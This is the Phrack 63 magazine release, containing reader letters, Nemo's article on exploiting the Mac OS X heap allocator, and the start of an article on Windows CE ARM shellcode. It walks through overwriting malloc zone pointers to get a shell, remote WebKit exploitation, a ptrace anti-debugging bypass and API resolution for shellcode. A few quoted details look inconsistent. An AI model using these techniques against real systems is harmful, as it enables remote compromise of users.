PHRACK Released at WhatTheHack2005 in the Netherlands

PHRACK 63 FINAL-2005!07!23 Phrack Revision 0.4


TABLE OF CONTENTS

Loopback, phrackstaff
Linenoise, phrackstaff
OSX Heap Exploitation Techniques, Nemo
Hacking Windows CE, San
Playing Games with Kernel Memory...FreeBSD Style, Joseph Kong
Raising The Bar For Windows Rootkit Detection, Jamie Butler & Sherri Sparks
Embedded ELF Debugging, ELFsh Crew
Hacking Grub for Fun and Profit, CoolQ
Antiforensic Evolution: S.E.L.F., Ripe & Pluf
Process Dump and Binary Reconstruction, ilo--
Next-Generation Runtime Binary Encryption, Zeljko Vrba
Shifting the Stack Pointer, Andrew Griffiths
NT Shellcode Prevention Demystified, Piotr Bania
Hardware Cryptography Primer, gab
PowerPC Cracking on OSX with GDB, curious
Hacking with Embedded Systems, Chui Yew Leong
Process Hiding & The Linux 2.4 Scheduler, Ubra
Breaking Through a Firewall, Soungjoo Han
>> Phrack World News (ezine only), phrackstaff

PHRACK ISSUE #63
__________________________

Editor: [email protected]
[email protected]
[email protected]
World News: [email protected]

You must put the word ANTISPAM somewhere in the Subject-line of your email. All others will meet their master in /dev/null. We reply to every mail. Lame emails make it into Loopback.
__________________________

Phrack Magazine Volume 11 Issue No. 63
July 15, 2005
ISBN M-AY-BES00N
__________________________

Artwork Contributor: Eddie Piskor, Fyodor Yarochkin, Sirtub, Halvar, Team Gobbles

All images, unless otherwise noted, are stolen. None of the owners were asked for permission to print or reproduce the whole or part of the artwork.
__________________________

Contents Copyright (c) 2005 Phrack Magazine. All Rights Reserved.

Nothing may be reproduced in whole or in part without the prior written permission from the editors. Phrack Magazine is made available to the public, as often as possible, free of charge.
__________________________

Download Phrack e-zine at http://www.phrack.org

Wow people.
We have received so much feedback since we announced that this is our final issue. I'm thrilled. We are hated by so many (hi Mr. Government) and loved by so few. And yet it is the few who kept us alive.
____________________________

Phrack helped me survive the crazyness and boredom inherent in The Man's system. Big thanks to all authors, editors and hangarounds of Phrack, past and present.

--- Kurisuteru

[...]
____________________________

Guys, if it wasn't for you, the internet wouldn't be the same, our whole lives wouldn't be the same. I wish you all the best luck there is in your future. God bless you all and good bye!!!!!

--- wolfnux

[I hope there is a god. There must be. Because I ran this magazine. I fought against injustice, oppression and against all those who wanted to shut us down. I fought against stupidity and ignorance. I shook hands with the devil. I have seen him, I have smelled him and I have touched him. I know the devil exists and therefore I know there is a God.]
____________________________

you're the first zine that i ever readed and you have a special place in my heart... you build my mind!! Thanks you all!!!!

--- thenucker/xy

[This brotherhood will continue...]
____________________________

Could you please remove my personal info from this issue?
http://www.phrack.org/phrack/52/P52-02
Thanks in advance.

Itai Dor-On

[...]

mtst1.c:

    #include <stdlib.h>

    int main(int ac, char **av)
    {
        char *a = malloc(10);
        __asm("trap");
        char *b = malloc(10);
    }

    -[nemo@gir:~]$ gcc mtst1.c -o mtst1
    -[nemo@gir:~]$ gdb ./mtst1
    GNU gdb 6.1-20040303 (Apple version gdb-413)
    (gdb) r
    Starting program: /Users/nemo/mtst1
    Reading symbols for shared libraries . done

Once we receive a SIGTRAP signal and return to the gdb command shell, we can use the command shown below to locate our initial szone_t structure in the process memory.

    (gdb) x/x &initial_malloc_zones
    0xa0010414: 0x01800000

This value, as expected inside gdb, is shown to be 0x01800000. If we dump memory at this location, we can see each of the fields in the _malloc_zone_t_ struct as expected.

NOTE: Output reformatted for more clarity.

    (gdb) x/x (long*) initial_malloc_zones
    [content omitted, please see electronic version]

In this struct we can see each of the function pointers which are called for each of the memory allocation/deallocation functions performed using the default zone, as well as a pointer to the name of the zone, which can be useful for debugging.

If we change the malloc() function pointer and continue our sample program (shown below), we can see that the second call to malloc() results in a jump to the specified value (after instruction alignment).

    (gdb) set *0x180000c = 0xdeadbeef
    (gdb) jump *($pc + 4)
    Continuing at 0x2cf8.

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
    0xdeadbeec in ?? ()
    (gdb)

Destroying The Apple Heap For Fun And Profit

But is it really feasible to write all the way to the address 0x1800000 (or 0x2800000 outside of gdb)? We will look into this now.

First we will check the addresses that allocations of various sizes are given. The location of each buffer depends on whether the allocation size falls into one of the various sized bins mentioned earlier (tiny, small or large).

To test the location of each of these we can simply compile and run the following small C program as shown:

    -[nemo@gir:~]$ cat > mtst2.c
    #include <stdio.h>
    #include <stdlib.h>

    int main(int ac, char **av)
    {
        extern int *malloc_zones;

        printf("initial_malloc_zones @ 0x%x\n", *malloc_zones);
        printf("tiny:  %p\n", malloc(22));
        printf("small: %p\n", malloc(500));
        printf("large: %p\n", malloc(0xffffffff));
        return 0;
    }
    -[nemo@gir:~]$ gcc mtst2.c -o mtst2
    -[nemo@gir:~]$ ./mtst2
    initial_malloc_zones @ 0x2800000
    tiny:  0x500160
    small: 0x2800600
    large: 0x26000

From the output of this program we can see that it is only possible to write to the initial_malloc_zones struct from a tiny or large buffer. Also, in order to overwrite the function pointers contained within this struct we need to write a considerable amount of data, completely destroying sections of the zone. Thankfully many situations exist in typical software which allow these criteria to be met.
This is discussed in the final section of this paper.

Now that we understand the layout of the heap a little better, we can use a small sample program to overwrite the function pointers contained in the struct to get a shell. The following program allocates a tiny buffer of 22 bytes. It then uses memset() to write 'A's all the way to the pointer for malloc() in the zone struct, before calling malloc().

[content omitted, please see electronic version]

However, when we compile and run this program, an EXC_BAD_ACCESS signal is received.

    (gdb) r
    Starting program: /Users/nemo/mtst3
    Reading symbols for shared libraries . done
    [+] tinyp is @ 0x300120
    [+] initial_malloc_zones is @ 0x1800000
    [+] Copying 0x14ffef0 bytes.

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0x00405000
    0xffff9068 in ___memset_pattern ()

This is due to the fact that, in between the tinyp pointer and the malloc function pointer we are trying to overwrite, there is some unmapped memory. In order to get past this we can use the fact that blocks of memory which fall into the large category are allocated using the mach vm_allocate() syscall.

If we can get enough memory to be allocated in the large classification before the overflow occurs, we should have a clear path to the pointer.

To illustrate this point, we can use the following code:

[content omitted, please see electronic version]

This code allocates enough large blocks of memory (0xffffffff) with which to plow a clear path to the function pointers. It then copies the address of the shellcode into memory all the way through the zone before overwriting the function pointers in the szone_t struct.
Finally a call to malloc() is made in order to trigger the execution of the shellcode.

As you can see below, this code functions as we'd expect and our shellcode is executed.

    -[nemo@gir:~]$ ./heaptst
    [+] malloc_zones (first zone) @ 0x2800000
    [+] addr @ 0x500120
    [+] addr + 36699872 = 0x2800000
    [+] Using shellcode @ 0x3014
    [+] finished memcpy()
    sh-2.05b$

This method has been tested on Apple's OSX version 10.4.1 (Tiger).

4 - A Real Life Example

The default web browser on OSX (Safari) as well as the mail client (Mail.app), Dashboard and almost every other application on OSX which requires web parsing functionality achieve this through a library which Apple call "WebKit". (2)

This library contains many bugs, many of which are exploitable using this technique. Particular attention should be paid to the code which renders blocks ;)

Due to the nature of HTML pages, an attacker is presented with opportunities to control the heap in a variety of ways before actually triggering the exploit. In order to use the technique described in this paper to exploit these bugs we can craft some HTML code, or an image file, to perform many large allocations and thereby cleave a path to our function pointers. We can then trigger one of the numerous overflows to write the address of our shellcode into the function pointers before waiting for a shell to be spawned.

One of the bugs which I have exploited using this particular method involves an unchecked length being used to allocate and fill an object in memory with null bytes (\x00). If we manage to calculate the write so that it stops midway through one of our function pointers in the szone_t struct, we can effectively truncate the pointer, causing execution to jump elsewhere.

The first step to exploiting this bug is to fire up the debugger (gdb) and look at what options are available to us.

Once we have Safari loaded up in our debugger, the first thing we need to check for the exploit to succeed is that we have a clear path to the initial_malloc_zones struct. To do this in gdb we can put a breakpoint on the return statement in the malloc() function.
We use the command "disas malloc" to view the assembly listing for the malloc function. The end of this listing is shown below:

[see electronic version phrackstaff]

The "blr" instruction shown at line 0x900039f0 is the "branch to link register" instruction. This instruction is used to return from malloc().

Functions in OSX on PPC architecture pass their return value back to the calling function in the "r3" register. In order to make sure that the malloc()ed addresses have reached the address of our zone struct we can put a breakpoint on this instruction, and output the value which was returned.

We can do this with the gdb commands shown below.

    (gdb) break *0x900039f0
    Breakpoint 1 at 0x900039f0
    (gdb) commands
    Type commands for when breakpoint 1 is hit, one per line.
    End with a line saying just "end".
    >i r r3
    >cont
    >end

We can now continue execution and receive a running status of all allocations which occur in our program. This way we can see when our target is reached.

The "heap" tool can also be used to see the sizes and numbers of each allocation.

There are several methods which can be used to set up the heap correctly for exploitation. One method, suggested by andrewg, is to use a .png image in order to control the sizes of allocations which occur. Apparently this method was learnt from zen-parse when exploiting a mozilla bug in the past.

The method which I have used is to create an HTML page which repeatedly triggers the overflow with various sizes. After playing around with this for a while, it was possible to regularly allocate enough memory for the overflow to occur.

Once the limit is reached, it is possible to trigger the overflow in a way which overwrites the first few bytes in any of the pointers in the szone_t struct.

Because of the big endian nature of PPC architecture (by default; it can be changed) the first few bytes in the pointer make all the difference and our truncated pointer will now point to the .TEXT segment.
The following gdb output shows our initial_malloc_zones struct after the heap has been smashed.

    (gdb) x/x (long )*&initial_malloc_zones
    0x1800000: 0x00000000 // Reserved1.
    (gdb)
    0x1800004: 0x00000000 // Reserved2.
    (gdb)
    0x1800008: 0x00000000 // size() pointer.
    (gdb)
    0x180000c: 0x00003abc // malloc() pointer.
    (gdb)                    ^^ smash stopped here.
    0x1800010: 0x90008bc4

As you can see, the malloc() pointer is now pointing to somewhere in the .TEXT segment, and the next call to malloc() will take us there. We can use gdb to view the instructions at this address, as you can see in the following example.

    (gdb) x/2i 0x00003abc
    0x3abc: lwz r4,0(r31)
    0x3ac0: bl 0xd686c

Here we can see that the r31 register must be a valid memory address for a start. Following this, the dyld_stub_objc_msgSend() function is called using the "bl" (branch updating link register) instruction. Again we can use gdb to view the instructions in this function.

    (gdb) x/4i 0xd686c
    0xd686c: lis r11,14
    0xd6870: lwzu r12,-31732(r11)
    0xd6874: mtctr r12
    0xd6878: bctr

We can see in these instructions that the r11 register must be a valid memory address. Other than that, the final two instructions (0xd6874 and 0xd6878) move the value in the r12 register to the count register, before branching to it. This is the equivalent of jumping to a function pointer in r12. Amazingly this code construct is exactly what we need.

So all that is needed to exploit this vulnerability now is to find somewhere in the binary where the r12 register is controlled by the user, directly before the malloc function is called.
Although this isn't terribly easy to find, it does exist.

However, if this code is not reached before one of the pointers contained on the (now smashed) heap is used, the program will most likely crash before we are given a chance to steal execution flow. Because of this fact, and because of the difficult nature of predicting the exact values with which to smash the heap, exploiting this vulnerability can be very unreliable. However, it definitely can be done.

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
    0xdeadbeec in ?? ()
    (gdb)

An exploit for this vulnerability means that a crafted email or website is all that is needed to remotely exploit an OSX user.

Apple have been contacted about a couple of these bugs and are currently in the process of fixing them.

The WebKit library is open source and available for download. Apparently it won't be too long before Nokia phones use this library for their web applications. [5]

5 - Miscellaneous

This section shows a couple of situations/observations regarding the memory allocator which did not fit into any of the other sections.

5.1 - Wrap-around Bug.

The examples in this paper allocated the value 0xffffffff. However, this amount is not technically feasible for a malloc implementation to allocate each time.

The reason this works without failure is due to a subtle bug which exists in the Darwin kernel's vm_allocate() function.

This function attempts to round the desired size up to the closest page aligned value.
However it accomplishes this by using the vm_map_round_page() macro (shown below.)

    #define PAGE_MASK (PAGE_SIZE - 1)
    #define PAGE_SIZE vm_page_size
    #define vm_map_round_page(x) \
            (((vm_map_offset_t)(x) + \
            PAGE_MASK) & \
            ~((signed)PAGE_MASK))

Here we can see that the page size minus one is simply added to the value which is to be rounded, before being bitwise ANDed with the complement of the PAGE_MASK.

The effect of this macro when rounding large values can be illustrated using the following code:

    #include <stdio.h>

    #define PAGEMASK 0xfff
    #define vm_map_round_page(x) \
            ((x + PAGEMASK) & ~PAGEMASK)

    int main(int ac, char **av)
    {
        /* 0xffffffff + 0xfff wraps around in 32 bits before masking */
        printf("0x%x\n", vm_map_round_page(0xffffffff));
    }

When run (below) it can be seen that the value 0xffffffff will be rounded to 0.

    -[nemo@gir:~]$ ./rounding
    0x0

Directly below where the rounding in vm_allocate() is performed, there is a check to make sure the rounded size is not zero. If it is zero then the size of a page is added to it, leaving only a single page allocated.

    map_size = vm_map_round_page(size);
    if (map_addr == 0)
        map_addr += PAGE_SIZE;

The code below demonstrates the effect of this on two calls to malloc().

    #include <stdio.h>
    #include <stdlib.h>

    int main(int ac, char **av)
    {
        char *a = malloc(0xffffffff);
        char *b = malloc(0xffffffff);

        printf("B - A: 0x%x\n", (unsigned)(b - a));
        return 0;
    }

When this program is compiled and run (below) we can see that although the programmer believes he/she now has a 4GB buffer, only a single page has been allocated.

    -[nemo@gir:~]$ ./ovrflw
    B - A: 0x1000

This means that most situations where a user specified length can be passed to the malloc() function, before being used to copy data, are exploitable.

This bug was pointed out to me by duke.

5.2 - Double free().

Bertrand's allocator keeps track of the addresses which are currently allocated. When a buffer is free()ed, the find_registered_zone() function is used to make sure that the address which is requested to be free()ed exists in one of the zones.
This check is shown below.

[content omitted, please see electronic version]

This means that an address free()ed twice (double free) will not actually be free()ed the second time, making it hard to exploit double free()s in this way.

However, when a buffer is allocated of the same size as the previous buffer and free()ed, but the pointer to the free()ed buffer still exists and is used, an exploitable condition can occur.

The small sample program below shows a pointer being allocated and free()ed, and then a second pointer being allocated of the same size, then free()ed twice.

    #include <stdio.h>
    #include <stdlib.h>

    int main(int ac, char **av)
    {
        char *b, *a = malloc(11);

        printf("a: %p\n", a);
        free(a);
        b = malloc(11);
        printf("b: %p\n", b);
        free(b);
        printf("b: %p\n", a);
        free(b);
        printf("a: %p\n", a);
        return 0;
    }

When we compile and run it, as shown below, we can see that pointer "a" still points to the same address as "b", even after it was free()ed. If this condition occurs and we are able to write to, or read from, pointer "a", we may be able to exploit this for an info leak, or gain control of execution.

    -[nemo@gir:~]$ ./dfr
    a: 0x500120
    b: 0x500120
    b: 0x500120
    tst(3575) malloc: *** error for object 0x500120: double free
    tst(3575) malloc: *** set a breakpoint in szone_error to debug
    a: 0x500120

I have written a small sample program to explain more clearly how this works. The code below reads a username and password from the user. It then compares the password to one stored in the file ".skrt". If this password is the same, the secret code is revealed. Otherwise an error is printed informing the user that the password was incorrect.

[content omitted, please see electronic version]

When we compile the program and enter an incorrect password we see the following message:

    -[nemo@gir:~]$ ./dfree
    login: nemo
    Enter your password:
    Password Rejected for nemo, please try again.

However, if the "admin_" string is detected in the string, the user buffer is free()ed.
The skrt buffer is then returned from malloc() pointing to the same allocated block of memory as the user pointer. This would normally be fine, however the user buffer is used in the printf() function call at the end of the function. Because the user pointer still points to the same memory as skrt, this causes an info-leak and the secret password is printed, as seen below:

    -[nemo@gir:~]$ ./dfree
    login: admin_nemo
    Admin user not allowed!
    Password Rejected for secret_password, please try again.

We can then use this password to get the combination:

    -[nemo@gir:~]$ ./dfree
    login: nemo
    Enter your password:
    The combination is 2C,4B,5C

5.3 - Beating ptrace()

Safari uses the ptrace() syscall to try and stop evil hackers from debugging their proprietary code. ;) The extract from the man-page below shows a ptrace() flag which can be used to stop people being able to debug your code.

[content omitted, please see electronic version]

There are a couple of ways to get around this check (which I am aware of). The first of these is to patch your kernel to stop the PT_DENY_ATTACH call from doing anything. This is probably the best way, however it involves the most effort.

The method which we will use now to look at Safari is to start up gdb and put a breakpoint on the ptrace() function. This is shown below:

    -[nemo@gir:~]$ gdb /Applications/Safari.app/Contents/MacOS/Safari
    GNU gdb 6.1-20040303 (Apple version gdb-413)
    (gdb) break ptrace
    Breakpoint 1 at 0x900541f4

We then run the program, and wait until the breakpoint is hit. When our breakpoint is triggered, we use the x/10i $pc command (below) to view the next 10 instructions in the function.

[content omitted, please see electronic version]

At line 0x90054204 we can see the instruction "sc" being executed. This is the instruction which calls the syscall itself. This is similar to int 0x80 on a Linux platform, or sysenter/int 0x2e in Windows.

In order to stop the ptrace() syscall from occurring we can simply replace this instruction in memory with a nop (no operation) instruction.
This way the syscall will never take place and we can debug without any problems.

To patch this instruction in gdb we can use the command shown below and continue execution.

    (gdb) set *0x90054204 = 0x60000000
    (gdb) continue

6 - Conclusion

Although the technique which was described in this paper seems rather specific, it is still valid and exploitation of heap bugs in this way is definitely possible.

When you are able to exploit a bug in this way you can quickly turn a complicated bug into the equivalent of a simple stack smash (3).

At the time of writing this paper, no protection schemes for the heap exist for Mac OSX which would stop this technique from working. (To my knowledge).

On a side note, if anyone works out why the initial_malloc_zones struct is always located at 0x2800000 outside of gdb and 0x1800000 inside, I would appreciate it if you let me know.

I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me time to research the things which I enjoy so much.

I'd also like to say hi to all the guys at Feline Menace, as well as pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the Chelsea for providing the AU felinemenace guys with buckets of corona to fuel our hacking. Thanks as well to duke for pointing out the vm_allocate() bug and ilja for discussing all of this with me on various occasions.

Free wd jail mitnick!


Hacking Windows CE

san

1 - Abstract

The network features of PDAs and mobiles are becoming more and more powerful, so their related security problems are attracting more and more attention. This paper will show a buffer overflow exploitation example in Windows CE. It will cover knowledge about the ARM architecture, memory management and the features of processes and threads of Windows CE. It also shows how to write shellcode in Windows CE, including knowledge about decoding shellcode of Windows CE with an ARM processor.

2 - Windows CE Overview

Windows CE is a very popular embedded operating system for PDAs and mobiles. As the name suggests, it's developed by Microsoft.
Because of the similar APIs, Windows developers can easily develop applications for Windows CE. Maybe this is an important reason that makes Windows CE popular. Windows CE 5.0 is the latest version, but Windows CE.net (4.2) is the most useful version, and this paper is based on Windows CE.net.

For marketing reasons, Windows Mobile Software for Pocket PC and Smartphone are considered as independent products, but they are also based on the core of Windows CE.

By default, Windows CE is in little-endian mode and it supports several processors.

3 - ARM Architecture

The ARM processor is the most popular chip in PDAs and mobiles; almost all of the embedded devices use ARM as CPU. ARM processors are typical RISC processors in that they implement a load/store architecture. Only load and store instructions can access memory. Data processing instructions operate on register contents only.

There are six major versions of the ARM architecture. These are denoted by the version numbers 1 to 6.

ARM processors support up to seven processor modes, depending on the architecture version. These modes are: User, FIQ (Fast Interrupt Request), IRQ (Interrupt Request), Supervisor, Abort, Undefined and System. The System mode requires ARM architecture v4 and above. All modes except User mode are referred to as privileged modes. Applications usually execute in User mode, but on Pocket PC all applications appear to run in kernel mode, and we'll talk about it later.

ARM processors have 37 registers. The registers are arranged in partially overlapping banks. There is a different register bank for each processor mode. The banked registers give rapid context switching for dealing with processor exceptions and privileged operations.
In ARM architecture v3 and above, there are 30 general-purpose 32-bit registers, the program counter (pc) register, the Current Program Status Register (CPSR) and five Saved Program Status Registers (SPSRs). Fifteen general-purpose registers are visible at any one time, depending on the current processor mode. The visible general-purpose registers are r0 to r14.

By convention, r13 is used as a stack pointer (sp) in ARM assembly language. The C and C++ compilers always use r13 as the stack pointer.

In User mode and System mode, r14 is used as a link register (lr) to store the return address when a subroutine call is made. It can also be used as a general-purpose register if the return address is stored in the stack.

The program counter is accessed as r15 (pc). It is incremented by four bytes for each instruction in ARM state, or by two bytes in Thumb state. Branch instructions load the destination address into the pc register.

You can load the pc register directly using data operation instructions. This feature is different from other processors and it is useful while writing shellcode.

4 - Windows CE Memory Management

Understanding memory management is very important for buffer overflow exploits. The memory management of Windows CE is very different from other operating systems, even other Windows systems.

Windows CE uses ROM (read only memory) and RAM (random access memory).

The ROM stores the entire operating system, as well as the applications that are bundled with the system. In this sense, the ROM in a Windows CE system is like a small read-only hard disk. The data in ROM can be maintained without battery power.

ROM-based DLL files can be designated as Execute in Place (XIP). XIP is a new feature of Windows CE.net. That is, they're executed directly from the ROM instead of being loaded into program RAM and then executed. It is a big advantage for embedded systems. The DLL code doesn't take up valuable program RAM and it doesn't have to be copied into RAM before it's launched.
So it takes less time to start an application. DLL files that aren't in ROM but are contained in the object store or on a Flash memory storage card aren't executed in place; they're copied into the RAM and then executed.

The RAM in a Windows CE system is divided into two areas: program memory and object store.

+----------------------------------------+ 0xFFFFFFFF
|   |   |Kernel Virtual Address:         |
|   | 2 |KPAGE Trap Area,                |
|   | G |KDataStruct, etc                |
|   | B |...                             |
|   |   |--------------------------------+ 0xF0000000
| 4 | K |Static Mapped Virtual Address   |
| G | E |...                             |
| B | R |...                             |
|   | N |--------------------------------+ 0xC4000000
| V | E |NK.EXE                          |
| I | L |--------------------------------+ 0xC2000000
| R |   |...                             |
| T |   |...                             |
| U |---|--------------------------------+ 0x80000000
| A |   |Memory Mapped Files             |
| L | 2 |...                             |
|   | G |--------------------------------+ 0x42000000
| A | B |Slot 32 Process 32              |
| D |   |--------------------------------+ 0x40000000
| D | U |...                             |
| R | S |--------------------------------+ 0x08000000
| E | E |Slot 3  DEVICE.EXE              |
| S | R |--------------------------------+ 0x06000000
| S |   |Slot 2  FILESYS.EXE             |
|   |   |--------------------------------+ 0x04000000
|   |   |Slot 1  XIP DLLs                |
|   |   |--------------------------------+ 0x02000000
|   |   |Slot 0  Current Process         |
+---+---+--------------------------------+ 0x00000000
                 Figure 1

The object store can be considered something like a permanent virtual RAM disk. Unlike the RAM disks on a PC, the object store maintains the files stored in it even if the system is turned off. This is the reason that Windows CE devices typically have a main battery and a backup battery. They provide power for the RAM to maintain the files in the object store. Even when the user hits the reset button, the Windows CE kernel starts up looking for a previously created object store in RAM and uses that store if it finds one.

The other area of the RAM is used for the program memory. Program memory is used like the RAM in personal computers. It stores the heaps and stacks for the applications that are running.
The boundary between the object store and the program RAM is adjustable. The user can move the dividing line between object store and program RAM using the System Control Panel applet.

Windows CE is a 32-bit operating system, so it supports a 4GB virtual address space. The layout is illustrated by Figure 1.

The upper 2GB is kernel space, used by the system for its own data. The lower 2GB is user space. Addresses from 0x42000000 to below 0x80000000 are used for large memory allocations, such as memory-mapped files; the object store is in here. Addresses from 0 to below 0x42000000 are divided into 33 slots, each of which is 32MB.

Slot 0 is very important; it's for the currently running process. The virtual address space layout is illustrated by Figure 2.

The first 64 KB is reserved by the OS. The process' code and data are mapped from 0x00010000, followed by stacks and heaps. DLLs are loaded at the top addresses. One of the new features of Windows CE.net is the expansion of an application's virtual address space from 32 MB, in earlier versions of Windows CE, to 64 MB, because Slot 1 is used for XIP.

5 - Windows CE Processes and Threads

Windows CE treats processes in a different way from other Windows systems. Windows CE limits the number of processes running at any one time to 32.
When the system starts, at least four processes are created: NK.EXE, which provides the kernel service, it's always in slot 97; FILESYS.EXE, which provides file system service, it's always in slot 2; DEVICE.EXE, which loads and maintains the device drivers for the system, it's in slot 3 normally; and GWES.EXE, which provides the GUI support, it's in slot 4 normally. The other processes are also started, such as EXPLORER.EXE.

+---+------------------------------------+ 0x02000000
|   | DLL Virtual Memory Allocations     |
| S |   +--------------------------------|
| L |   |ROM DLLs: R/W Data              |
| O |   |--------------------------------|
| T |   |RAM DLL+OverFlow ROM DLL:       |
| 0 |   |Code+Data                       |
|   |   +--------------------------------|
| C +------+-----------------------------|
| U        |                  A          |
| R        V                  |          |
| R +-------------------------+----------|
| E | General Virtual Memory Allocations |
| N |   +--------------------------------|
| T |   |Process VirtualAlloc() calls    |
|   |   |--------------------------------|
| P |   |Thread Stack                    |
| R |   |--------------------------------|
| O |   |Process Heap                    |
| C |   |--------------------------------|
| E |   |Thread Stack                    |
| S |---+--------------------------------|
| S | Process Code and Data              |
|   |------------------------------------+ 0x00010000
|   | Guard Section(64K)+UserKInfo       |
+---+------------------------------------+ 0x00000000
                 Figure 2

Shell is an interesting process because it's not even in the ROM. SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
The only way to load it is by connecting the system to the PC debugging station so that the file can be automatically downloaded from the PC. When you use Platform Builder to debug the Windows CE system, SHELL.EXE will be loaded into the slot after FILESYS.EXE.

Threads under Windows CE are similar to threads under other Windows systems. Each process has at least a primary thread associated with it upon starting, even if it never explicitly created one. A process can create any number of additional threads; it's only limited by available memory.

Each thread belongs to a particular process and shares the same memory space. But SetProcPermissions(-1) gives the current thread access to any process. Each thread has an ID, a private stack and a set of registers. The stack size of all threads created within a process is set by the linker when the application is compiled.

The IDs of processes and threads in Windows CE are the handles of the corresponding process and thread. It's funny, but it's useful while programming.

When a process is loaded, the system will assign the next available slot to it. DLLs are loaded into the slot, followed by the stack and default process heap. After this, the process is executed.

When a process' thread is scheduled, the system will copy from its slot into slot 0. It isn't a real copy operation; it seems to be just mapped into slot 0. This is mapped back to the original slot allocated to the process if the process becomes inactive. Kernel, file system and windowing system all run in their own slots.

Processes allocate a stack for each thread. The default size is 64KB, depending on the link parameter when the program is compiled. The top 2KB is used to guard against stack overflow; we can't destroy this memory, otherwise the system will freeze. The remainder is available for use.

Variables declared inside functions are allocated on the stack. A thread's stack memory is reclaimed when it terminates.

6 - Windows CE API Address Search Technology

We must have shellcode that runs under Windows CE before we can exploit anything. Windows CE is implemented to be Win32 compatible.
Coredll provides the entry points for most APIs supported by Windows CE, so it is loaded by every process. coredll.dll is just like kernel32.dll and ntdll.dll on other Win32 systems. We have to find the necessary API addresses in coredll.dll and then use these APIs to implement our shellcode. The traditional method of implementing shellcode on other Win32 systems is to locate the base address of kernel32.dll via the PEB structure and then search for API addresses via the PE header.

Firstly, we have to locate the base address of coredll.dll. Is there a structure like the PEB under Windows CE? The answer is yes. KDataStruct is an important kernel structure that can be accessed from user mode through the fixed address PUserKData. It keeps important system data, such as the module list, the kernel heap, and the API set pointer table (SystemAPISets).

KDataStruct is defined in nkarm.h:

[content omitted, please see electronic version]

The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor, and 0x00005800 on other CPUs. The last member of KDataStruct is aInfo, at offset 0x300 from the start of the KDataStruct structure. aInfo is a DWORD array; index 9 (KINX_MODULES, defined in pkfuncs.h) holds a pointer to the module list. So the pointer to the module list is at offset 0x324 from 0xFFFFC800.

Well, let's look at the Module structure. I marked the offsets of the Module structure as follows:

[content omitted, please see electronic version]

The Module structure is defined in kernel.h. Its third member is lpszModName, the module name string pointer, at offset 0x08 from the start of the Module structure. The module name is a Unicode string. The second member is pMod, an address that points to the next module in the chain. So we can locate the coredll module by comparing the Unicode string of its name.

At offset 0x74 from the start of the Module structure there is an e32 member, which is an e32_lite structure.
Let's look at the e32_lite structure, which is defined in pehdr.h. In the e32_lite structure, the member e32_vbase gives the virtual base address of the module. It is at offset 0x7c from the start of the Module structure. We also noticed the member e32_unit[LITE_EXTRA], which is an array of info structures. LITE_EXTRA is defined as 6 at the head of pehdr.h; only the first 6 entries are used by NK, and the first is the export table position. So offset 0x8c from the start of the Module structure holds the relative virtual address of the module's export table.

From now on, we have the virtual base address of coredll.dll and the relative virtual address of its export table.

I wrote the following small program to list all modules of the system:

[content omitted, please see electronic version]

In my environment, the Module structure is at 0x8F453128, which is in kernel space. Most Pocket PC ROMs were built with the Enable Full Kernel Mode option, so all applications appear to run in kernel mode. The low 5 bits of the Psr register are 0x1F when debugging, which means the ARM processor runs in system mode. This value is defined in nkarm.h:

// ARM processor modes
#define USER_MODE   0x10 // 0b10000
#define FIQ_MODE    0x11 // 0b10001
#define IRQ_MODE    0x12 // 0b10010
#define SVC_MODE    0x13 // 0b10011
#define ABORT_MODE  0x17 // 0b10111
#define UNDEF_MODE  0x1b // 0b11011
#define SYSTEM_MODE 0x1f // 0b11111

I wrote a small function in assembly to switch the processor mode, because EVC doesn't support inline assembly. The program can't get the values of BaseAddress and DllName once I have switched the processor to user mode; it raises an access violation exception.

Using this program without changing the processor mode, I found that the virtual base address of coredll.dll is 0x01F60000. But this address is invalid when I look at it in the EVC debugger, and the valid data starts at 0x01F61000.
I think Windows CE may skip loading the header of DLL files in order to save memory space or time.

Because we have the virtual base address of coredll.dll and the relative virtual address of its export table, we can get an API address by repeatedly comparing API names through the IMAGE_EXPORT_DIRECTORY structure. The IMAGE_EXPORT_DIRECTORY structure is the same as on other Win32 systems and is defined in winnt.h:

[content omitted, please see electronic version]

7 - The Shellcode for Windows CE

There are some things to notice before writing shellcode for Windows CE. Windows CE uses r0-r3 for the first to fourth parameters of an API. If an API takes more than four parameters, Windows CE uses the stack to store the others. So care is needed when writing shellcode, because the shellcode itself will reside on the stack. test.asm is our shellcode:

[content omitted, please see electronic version]

This shellcode consists of three parts. Firstly, it calls the get_export_section function to obtain the virtual base address of coredll and the relative virtual address of its export table; these are stored in r0 and r1. Second, it calls the find_func function to obtain the API addresses through the IMAGE_EXPORT_DIRECTORY structure and stores each API address at the location of its own hash value. The last part is the functional implementation of our shellcode: it changes the registry key HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and then uses KernelIoControl to soft-restart the system.

Windows CE.NET provides BthGetMode and BthSetMode to get and set the bluetooth state. But HP IPAQs use the Widcomm stack, which has its own API, so BthSetMode can't turn on bluetooth on an IPAQ. Well, there is another way to turn on bluetooth on IPAQs (my PDA is an HP 1940). Just change HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and reset the PDA; bluetooth will be on after the system restarts. This method is not pretty, but it works.

Well, let's look at the get_export_section function. Why did I comment out the ldr r4, =0xffffc800 instruction? We must pay attention to the ARM assembly language's LDR pseudo-instruction.
It can load a register with a 32-bit constant value or an address. The instruction ldr r4, =0xffffc800 becomes ldr r4, [pc, #0x108] in the EVC debugger, so the value loaded into r4 depends on the program surrounding it. In shellcode, r4 therefore won't get the value 0xffffc800, and the shellcode will fail. The instruction ldr r5, =0x324 becomes mov r5, #0xC9, 30 in the EVC debugger, which is fine when the shellcode is executed. The simple solution is to place the large constant value inside the shellcode, use the ADR pseudo-instruction to load the address of that value into a register, and then read the value from memory into the register.

To save size, we can use a hash technique to encode the API names. Each API name is encoded into 4 bytes. The hash technique comes from LSD's Win32 Assembly Components.

The compile method is as follows:

armasm test.asm
link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

